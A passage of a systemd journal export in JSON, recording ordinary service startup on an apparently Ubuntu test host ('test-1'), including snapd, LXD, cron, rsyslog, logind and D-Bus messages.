"SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "MESSAGE" : "Listening on Socket activation for snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818023733" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=309;b=e2b08827b5804427b422c10c84f1567e;m=2a62561;t=5bd16df69a4c9;x=e23bc822a4dc114a", "__REALTIME_TIMESTAMP" : "1615280818726089", "__MONOTONIC_TIMESTAMP" : "44442977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "MESSAGE" : "Listening on LXD - unix socket.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818026729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30a;b=e2b08827b5804427b422c10c84f1567e;m=2a625c9;t=5bd16df69a530;x=fa87a3ac4fd2d1ff", "__REALTIME_TIMESTAMP" : "1615280818726192", "__MONOTONIC_TIMESTAMP" : "44443081", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "UNIT" : "sockets.target", "INVOCATION_ID" : "07a9deddd9d140e1853a06c0058677c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818034574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30b;b=e2b08827b5804427b422c10c84f1567e;m=2a6261a;t=5bd16df69a582;x=961e7e7821c825db", "__REALTIME_TIMESTAMP" : "1615280818726274", "__MONOTONIC_TIMESTAMP" : "44443162", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "UNIT" : "basic.target", "INVOCATION_ID" : "d287654c12884bad9dbb0b0de0e108f6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818042137" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30c;b=e2b08827b5804427b422c10c84f1567e;m=2a62688;t=5bd16df69a5f0;x=3dcf5fd1dcd7fd00", "__REALTIME_TIMESTAMP" : "1615280818726384", "__MONOTONIC_TIMESTAMP" : "44443272", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - container startup/shutdown...", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818047751" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30d;b=e2b08827b5804427b422c10c84f1567e;m=2a6290b;t=5bd16df69a873;x=d26f496ee754c981", "__REALTIME_TIMESTAMP" : "1615280818727027", "__MONOTONIC_TIMESTAMP" : "44443915", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Deferred execution scheduler.", "UNIT" : "atd.service", "INVOCATION_ID" : "1ebd91a7fefa4e53858a79ee62b15641", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818055768" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30e;b=e2b08827b5804427b422c10c84f1567e;m=2a62999;t=5bd16df69a901;x=bbd8fd3e43d9c647", "__REALTIME_TIMESTAMP" : "1615280818727169", "__MONOTONIC_TIMESTAMP" : "44444057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Regular background program processing daemon.", "UNIT" : "cron.service", "INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818064486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30f;b=e2b08827b5804427b422c10c84f1567e;m=2a629ee;t=5bd16df69a956;x=bfda37168b7b7553", "__REALTIME_TIMESTAMP" : "1615280818727254", "__MONOTONIC_TIMESTAMP" : "44444142", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Dispatcher daemon for systemd-networkd...", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818074184" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=310;b=e2b08827b5804427b422c10c84f1567e;m=2a62a97;t=5bd16df69a9fe;x=449072b715fc5dc7", "__REALTIME_TIMESTAMP" : "1615280818727422", "__MONOTONIC_TIMESTAMP" : "44444311", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: automatic crash report generation...", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818083002" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=311;b=e2b08827b5804427b422c10c84f1567e;m=2a62b02;t=5bd16df69aa6a;x=54556e10ba188efd", "__REALTIME_TIMESTAMP" : "1615280818727530", "__MONOTONIC_TIMESTAMP" : "44444418", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started irqbalance daemon.", "UNIT" : "irqbalance.service", "INVOCATION_ID" : "1be2a31769ab44beb8244d37671930ea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818108770" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=312;b=e2b08827b5804427b422c10c84f1567e;m=2a62b8a;t=5bd16df69aaf1;x=fbcad028f3bb2848", "__REALTIME_TIMESTAMP" : "1615280818727665", "__MONOTONIC_TIMESTAMP" : "44444554", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting System Logging Service...", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818117517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=313;b=e2b08827b5804427b422c10c84f1567e;m=2a63106;t=5bd16df69b06d;x=44466dd6d4bbe35a", "__REALTIME_TIMESTAMP" : "1615280818729069", "__MONOTONIC_TIMESTAMP" : "44445958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Login Service...", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818123449" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=314;b=e2b08827b5804427b422c10c84f1567e;m=2a63169;t=5bd16df69b0d1;x=2a228382b0220274", "__REALTIME_TIMESTAMP" : "1615280818729169", "__MONOTONIC_TIMESTAMP" : "44446057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Accounts Service...", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818132053" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=315;b=e2b08827b5804427b422c10c84f1567e;m=2a631b7;t=5bd16df69b11e;x=62f06e0e7556c3cb", "__REALTIME_TIMESTAMP" : "1615280818729246", "__MONOTONIC_TIMESTAMP" : "44446135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Pollinate to seed the pseudo random number generator...", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818137998" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=316;b=e2b08827b5804427b422c10c84f1567e;m=2a63203;t=5bd16df69b16a;x=d489302caa2261be", "__REALTIME_TIMESTAMP" : "1615280818729322", "__MONOTONIC_TIMESTAMP" : "44446211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: Record successful boot for GRUB...", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818151385" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=317;b=e2b08827b5804427b422c10c84f1567e;m=2a6324e;t=5bd16df69b1b6;x=406920915460381", "__REALTIME_TIMESTAMP" : "1615280818729398", "__MONOTONIC_TIMESTAMP" : "44446286", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started FUSE filesystem for LXC.", "UNIT" : "lxcfs.service", "INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818160126" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=318;b=e2b08827b5804427b422c10c84f1567e;m=2a63297;t=5bd16df69b1ff;x=a8ac43dca251c82f", "__REALTIME_TIMESTAMP" : "1615280818729471", "__MONOTONIC_TIMESTAMP" : "44446359", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started D-Bus System Message Bus.", "UNIT" : "dbus.service", "INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818169699" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=319;b=e2b08827b5804427b422c10c84f1567e;m=2a632fd;t=5bd16df69b264;x=797028d2a0721f41", "__REALTIME_TIMESTAMP" : "1615280818729572", "__MONOTONIC_TIMESTAMP" : "44446461", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", "MESSAGE" : "Watching system buttons on /dev/input/event0 (Power Button)", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270222" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31a;b=e2b08827b5804427b422c10c84f1567e;m=2a63468;t=5bd16df69b3cf;x=c81d19038f20e303", "__REALTIME_TIMESTAMP" : "1615280818729935", "__MONOTONIC_TIMESTAMP" : "44446824", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270478" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31b;b=e2b08827b5804427b422c10c84f1567e;m=2a634c0;t=5bd16df69b428;x=5665e3444908c6b1", "__REALTIME_TIMESTAMP" : "1615280818730024", "__MONOTONIC_TIMESTAMP" : "44446912", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-seat.c", "CODE_LINE" : "424", "CODE_FUNC" : "seat_start", "MESSAGE_ID" : "fcbefc5da23d428093f97c82a9290f7b", "SEAT_ID" : "seat0", "MESSAGE" : "New seat seat0.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31c;b=e2b08827b5804427b422c10c84f1567e;m=2a6352c;t=5bd16df69b493;x=566b08c1e3e04161", "__REALTIME_TIMESTAMP" : "1615280818730131", "__MONOTONIC_TIMESTAMP" : "44447020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Snappy daemon...", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818338766" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31d;b=e2b08827b5804427b422c10c84f1567e;m=2a63582;t=5bd16df69b4ea;x=85a338f5b6a97b6d", "__REALTIME_TIMESTAMP" : "1615280818730218", "__MONOTONIC_TIMESTAMP" : "44447106", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", 